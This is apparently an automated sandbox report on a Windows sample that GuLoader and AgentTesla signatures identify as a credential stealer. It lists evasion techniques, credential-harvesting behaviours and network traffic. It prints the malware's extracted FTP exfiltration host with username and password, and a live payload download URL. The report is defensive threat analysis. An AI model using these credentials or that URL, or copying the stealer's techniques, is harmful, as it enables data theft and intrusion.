Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Documenti di spedizione.bat.exe

Overview

General Information

Sample name:Documenti di spedizione.bat.exe
Analysis ID:1568249
MD5:a10e959289c077bc452de5c48abd7262
SHA1:9b295da45f8cc4fa5e5b94ba1ad3de93c617eadf
SHA256:e246806c6b16a736f29c6c3677c9f9263c8a0dc347a92a4f2606e93b13aec707
Tags:batexeGuLoaderuser-abuse_ch
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.3389706331.000000003333C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.3389706331.0000000033311000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.3389706331.0000000033311000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.2721160170.0000000003B68000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: Documenti di spedizione.bat.exe PID: 5684JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-04T13:40:15.537057+010028032702Potentially Bad Traffic192.168.2.649845109.248.150.25280TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://concaribe.comAvira URL Cloud: Label: malware
            Source: http://ftp.concaribe.comAvira URL Cloud: Label: malware
            Source: Documenti di spedizione.bat.exe.5684.4.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Documenti di spedizione.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49853 version: TLS 1.2
            Source: Documenti di spedizione.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeDirectory queried: number of queries: 1001
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_004069FF FindFirstFileW,FindClose,0_2_004069FF
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405DAE
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_00402930 FindFirstFileW,4_2_00402930
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_004069FF FindFirstFileW,FindClose,4_2_004069FF
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405DAE
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewIP Address: 192.185.13.234 192.185.13.234
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49845 -> 109.248.150.252:80
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /WrqjRdXcfPugZeXkIIJdo57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 109.248.150.252Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: unknownTCP traffic detected without corresponding DNS query: 109.248.150.252
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /WrqjRdXcfPugZeXkIIJdo57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 109.248.150.252Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: ftp.concaribe.com
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3389404705.0000000032540000.00000004.00001000.00020000.00000000.sdmp, Documenti di spedizione.bat.exe, 00000004.00000002.3370388487.0000000002FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.248.150.252/WrqjRdXcfPugZeXkIIJdo57.bin
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3389706331.000000003333C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://concaribe.com
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3389706331.000000003333C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.concaribe.com
            Source: Documenti di spedizione.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3389706331.00000000332C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3389706331.00000000332C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3389706331.00000000332C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3389706331.00000000332C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
            Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49853 version: TLS 1.2
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_00405866 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405866

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Documenti di spedizione.bat.exe
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403665
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_00406DC00_2_00406DC0
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_73D81BFF0_2_73D81BFF
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_00406DC04_2_00406DC0
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_000DB21D4_2_000DB21D
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_000DE3604_2_000DE360
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_000D4A584_2_000D4A58
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_000D3E404_2_000D3E40
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_000D41884_2_000D4188
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_3643D6904_2_3643D690
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_364391B04_2_364391B0
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_3643CE214_2_3643CE21
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_3643BB904_2_3643BB90
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_3643A7DC4_2_3643A7DC
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_364456A04_2_364456A0
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_3644C2404_2_3644C240
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_3644B2F04_2_3644B2F0
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_364431584_2_36443158
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_364477604_2_36447760
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_3644E4684_2_3644E468
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_36445DB74_2_36445DB7
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_364423704_2_36442370
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_364400404_2_36440040
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_36812B984_2_36812B98
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: String function: 00402DCB appears 51 times
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3389673551.00000000331B9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Documenti di spedizione.bat.exe
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3370388487.0000000002FA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Documenti di spedizione.bat.exe
            Source: Documenti di spedizione.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/7@2/3
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403665
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_00404B12 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404B12
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile created: C:\Users\user\AppData\Roaming\PremolderJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsw245E.tmpJump to behavior
            Source: Documenti di spedizione.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile read: C:\Users\user\Desktop\Documenti di spedizione.bat.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Documenti di spedizione.bat.exe "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess created: C:\Users\user\Desktop\Documenti di spedizione.bat.exe "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess created: C:\Users\user\Desktop\Documenti di spedizione.bat.exe "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile written: C:\ProgramData\Microsoft\Windows\Start Menu\corruptive.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Documenti di spedizione.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2721160170.0000000003B68000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_73D81BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73D81BFF
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_73D830C0 push eax; ret 0_2_73D830EE
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_000D0C6D push edi; retf 4_2_000D0C7A
